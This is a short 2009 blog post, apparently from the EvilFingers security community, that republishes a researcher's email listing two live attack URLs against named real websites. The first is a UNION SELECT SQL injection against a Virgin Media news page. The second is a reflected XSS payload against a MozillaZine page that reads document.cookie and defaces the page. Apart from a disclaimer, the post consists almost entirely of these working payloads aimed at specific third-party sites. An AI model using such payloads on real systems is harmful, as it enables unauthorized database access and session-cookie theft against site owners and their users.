Saturday, January 17, 2009

SQL Injection and XSS Vulnerabilities

Rohit Bansal, an active member of security research community has been actively submitting XSS and SQL Injection to PacketStormSecurity and XSSed websites.

He sent us the following stuff for publishing in our blog:

*** PASTED FROM Rohit Bansal's EMAIL ***

SQL Injection:

Vuln: http://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+ and 1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10

XSS:

http://www.mozillazine.org/talkback.html?article=26260%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch2%3EXSS%20By%20Evilfingers%3Ch2%3E%3C/script%3E

*** PASTED FROM Rohit Bansal's EMAIL ***

Disclaimer: EvilFingers community is not responsible for any of the information pasted above. Read our Legal section.

- EF

No comments: